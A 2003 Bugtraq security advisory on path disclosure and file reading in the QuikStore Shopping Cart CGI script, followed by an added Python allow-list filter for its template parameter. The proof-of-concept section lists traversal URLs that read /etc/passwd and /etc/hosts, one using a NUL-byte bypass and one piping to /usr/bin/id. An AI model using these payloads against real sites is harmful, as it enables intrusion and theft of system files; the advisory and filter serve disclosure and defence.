QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users

From: Dr`Ponidi Haryanto (drponidi_at_hackermail.com)
Date: 12/23/03

    To: bugtraq@securityfocus.com
    Date: Tue, 23 Dec 2003 20:48:51 +0800
    
    

    Indonesia Security Development Team Advisory

    QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
    =====================================================================

             Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
              Release Date: 5:08 23/12/03
               Application: QuikStore Shopping Cart
                    Author: Dr`Ponidi <drponidi@kecoak.org>
             Discovered by: Dr`Ponidi <drponidi@kecoak.org>
           Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
             Vendor Status: The vendor has been contacted
                Vendor URL: http://www.quikstore.com
                 Reference: http://drponidi.5u.com/advisory.htm
                 Greetz to: #indohack #k-elektronik #dhegleng @ dal.net

    [Details]
    A remote user can reportedly send a request that causes the system
    to display an error message that indicates the installation path.
    It is possible to make a malformed HTTP request for many files in
    QuikStore Shopping Cart and in doing so trigger an error.
    The resulting error message discloses potentially sensitive installation
    path information to the remote attacker. QuikStore Shopping Cart also allows
    remote file reading: users can view files on the system with the privileges
    of the web server.

    [Proof of Concept]
    http://[target]/cgi-bin/quikstore.cgi?store='
    http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
    http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
    http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|

    [Suggestions]
    Filter all files

    [Patch:]
    Not yet available

    [About Indonesia Security Development Team]
    Indonesia Security Development Team researches and develops
    intelligent, advanced application security assessment. Based in
    Indonesia, Indonesia Security Development Team offers the best of
    breed security consulting services, specializing in shopping carts
    software and network security assessments. We provide security
    information and patches for use by the entire network security community.
     

    This information is provided freely to all interested parties and may
    be redistributed provided that it is not altered in any way, and that
    the author is appropriately credited.

    Indonesia Security Development Team Advisory:
    http://drponidi.5u.com/advisory.htm
    _______________________________________________________________
    Dr`Ponidi <drponidi@kecoak.org>
    Original document can be found at http://drponidi.5u.com/advisory.htm
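
The advisory's suggestion to filter file names, shown as an added example (not QuikStore code and not from the advisory's author): an allow-list check for a `template` value, run against constructed requests shaped like the proof-of-concept URLs. The names `resolve_template`, `template_param`, `SAFE_NAME`, the host `shop.example` and the `.html`-only policy are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

# Hypothetical policy: a template name is a bare file name ending in .html.
# The allow-list rejects "/", "..", NUL bytes and "|" without naming each one.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.html")


def resolve_template(name, template_dir):
    """Return the real path of an allowed template, or None if rejected."""
    if not SAFE_NAME.fullmatch(name):
        return None
    base = os.path.realpath(template_dir)
    path = os.path.realpath(os.path.join(base, name))
    # Defence in depth: a symlink inside the directory must not escape it.
    if os.path.commonpath([base, path]) != base:
        return None
    return path if os.path.isfile(path) else None


def template_param(url):
    """Extract the percent-decoded 'template' value, as a CGI layer would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("template", [""])[0]


def check_samples():
    """Validate constructed requests; only the first names a real template."""
    with tempfile.TemporaryDirectory() as tdir:
        with open(os.path.join(tdir, "catalog.html"), "w") as fh:
            fh.write("<html></html>")
        base = "http://shop.example/quikstore.cgi?category=blah&template="
        samples = [  # constructed inputs, not captured traffic
            base + "catalog.html",
            base + "../../etc/passwd%00.html",  # decoded NUL before .html
            base + "../../etc/hosts",           # plain traversal
            base + "../../usr/bin/id|",         # trailing pipe
        ]
        return [resolve_template(template_param(u), tdir) is not None
                for u in samples]


if __name__ == "__main__":
    print(check_samples())
```

The check runs on the decoded parameter, so the `%00` case is rejected on the NUL byte itself rather than passing because the string still ends in `.html`.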

    
